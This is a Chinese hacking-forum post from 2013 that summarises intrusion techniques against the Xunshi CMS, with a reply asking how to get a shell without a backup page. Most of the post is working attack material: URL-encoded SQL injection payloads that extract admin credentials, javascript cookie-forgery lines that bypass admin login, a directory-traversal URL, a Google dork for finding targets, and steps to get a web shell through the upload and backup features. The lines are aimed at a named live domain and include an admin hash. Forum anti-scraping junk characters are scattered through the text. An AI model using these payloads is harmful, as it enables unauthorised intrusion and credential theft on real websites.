找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2581|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
by:血封忆尘+ K) ?* d" T# w  i8 f
% v/ v: [4 j2 S) V  C. M; M: F
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
+ y( i2 u+ O" V: j7 {
  q" d5 L0 O, f7 O7 B$ G以下本文总结来自黑防去年第9期杂志上的内容...
- \) a( r+ i* ~) S5 N% ]' C/ ~6 o1 N% c5 Q) D( X
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%. F. ?/ k7 y, V

/ A3 \; z9 i3 h  K  _2 I26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 3 Q$ D3 i4 \; v/ |9 M

) |0 ]3 G: W" K, F! z4 j: E0 v记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况" ]+ F$ x) u6 K5 ~7 X
这里一个注入  w% i7 X2 ]( H4 r

: O6 v8 G# U5 T1 A* q( ], u效果如图:7 ~& ]! I1 W. \1 |2 c
- K: t9 W. B6 p! n

/ D1 _& P0 k: M  {* ]
$ f! w& q/ z) H! B2 I7 r这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.7 x6 Q6 K9 E# |  |: j" X, k' B

# n) Y9 D$ |- W' ^2 @密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
5 ^' \( Z* H+ P* ^( H! U* b
" w9 K- y% ~# x. C. |8 ]3 @  kjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
& S6 j# \- b! {3 j- M
8 R: `. o4 p4 u2 `2 k: M那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
" C- {) m. K% J) V& p
$ K' J( G& l2 ?$ K& l, [1 {因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞2 |! A: J1 _) S
* k! _' q/ B* d8 O( b; C6 R+ A, s6 G
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
! t5 X  n, |, ^+ p5 o" y* V* C0 Q: V8 u# m) t$ S
访问这页面来列目录..步骤如下:$ X" Q3 [; u1 z9 H+ Z$ X2 f  X

9 A( J4 T+ ^3 g5 Y9 x2 h" pjavascript:alert(document.cookie="admindj=1")
% J9 I9 @1 y0 D  {7 L4 h6 d+ l0 D9 N8 N" h8 n
http://www.political-security.co ... asp?id=46&dir=../..
& {% x2 a9 v. y5 y' z+ o/ M4 ]. o+ S7 J
效果如图:3 t4 F! r. V$ ^) H5 v) U5 a: ^6 |6 E

2 B% U, L( q- J7 p# a: y$ L ' u- K9 q" P' I: g8 K3 o. b) K
. z7 p1 e6 A  [. O  C9 K* l
这样全站目录都能瞧了..找到后台目录..进去..; B! q7 C: j" `1 v3 P  L$ A6 x6 @

# a! v8 w# _* L) j; Q* `2 v3 i那么进了后台怎么拿shell??上传--备份就ok了..: y8 {+ o2 F2 i- p1 H1 r* W4 t

: g- _' p  ~: h4 q那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
& m. J( H0 ]6 {! N1 i; l7 @: y7 ~& j1 {, x- U+ A* Z
这个我也碰到过一次..你都可以通过列目录来实现..% M1 a% v. w$ R1 [
5 a  n7 O8 z7 U4 A: F* t
javascript:alert(document.cookie="admindj=1")
7 |% F; M* E  r  ^
+ u& C- R* |) b8 x/ J7 ahttp://www.political-security.co ... p?action=BackupData
0 }3 T: i/ ]% p, z1 j3 c( L
" l* H) l9 ~" S2 ?; _$ _备份ok..
5 g& A/ y7 m. T# P/ b/ y) [* s  y5 Y( a! X& L
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?5 j, v: Z5 p- A3 G! j
6 k+ j% N$ f3 W; o( D
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
% _3 O" R0 I! x, }" w: q$ U( m+ ?( ~
然后访问此页面进行注入..步骤如下:  ^* _4 M% ?( o1 M! z

0 O4 Z$ e7 W7 k  }4 R* @2 \" G( d: Xjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
8 ?" a8 }2 C9 k( z4 F1 t$ _/ t# _; h3 V9 V- b+ b/ I
然后请求admin/admin_chk.asp页面
! F; [6 Q( B- f
& R7 Z2 |; @: O  L* s- h# T. M" S输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
8 h' ~# i- E  |1 l: v9 i2 ]" A
* q1 {8 n3 H. c  ?26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
! |- G2 W: Q: I0 N+ b$ m& e$ g5 W- {- M- ^( [1 [' \; v# d
效果如图所示:
8 r9 F* k0 w8 K+ r  B7 {' m( I! F  N
4 g0 u" @, K. p$ ~# V . f3 S3 ]7 Q# J

3 N. R0 Y' M  k: J0 u) N" M) m/ ^讯时漏洞2
- l3 j& r" ]- {0 zgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)6 H/ _. Z# `6 _. X9 o

9 F7 o/ ?* d+ X" F1、/admin/admin_news_pl_view.asp?id=1
5 n% Y8 l: H; Y/ G3 u//id任意 填入以下语句, N1 \9 v) w. G$ H1 S  B; |

0 u' i' C% j8 T2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
( r* ]; p7 k' k * z" l4 K6 ?; T* B2 Q+ J. _5 b
: E9 d& ]8 _0 f6 e; d; l4 {( Q

& b3 m+ R' P! v0 {9 p1 ?8 Q3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
! y1 D) O4 y4 M6 i8 M # J% d1 o9 S' X* O( F7 p

3 H/ H/ D/ N. [+ B
* H6 R$ Z; e) a/ }9 }  v+ G爆出管理员帐号和密码了% p$ q# u2 V+ z2 ^
% t5 [# v& G5 e! u4 v1 T$ g

9 r# G& y; ~  h, p; S" @& X& R$ t; K
4、cookies进后台+ {; n! u" ^3 i+ N# i* @
: r2 L+ s4 _* O, R4 N
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));4 V! N5 Y5 X. E" C6 r
4 r: ?* a' w; k& f

" @) n1 m4 n& S5 m5 n/ I) m( X2 I8 O0 M' C% n7 X
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
( I2 a) F) Q* g0 e8 ` " O/ N/ d/ R, h; r& w
2 n" @, s; b( ~$ G# a) \# ?( M
' V& ~0 I) s% J  t7 [7 ]6 C
6、后台有上传和备份取SHELL不难。: y, M6 v1 G) H
$ m" m( D+ R0 ^- h1 r1 z, x' r) g
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..# S$ S" b, [8 D

2 I+ U" `. j7 @0 V+ ^# i- |; X逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
# Y% S! ]+ W9 M- b. X( @- T: Y
7 X: F" w" X# j; c" e* ~6 [1 r1 X- m+ w
% [! t; h; O8 `7 G/ F8 H3 X  p" S3 ~4 _! x  |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表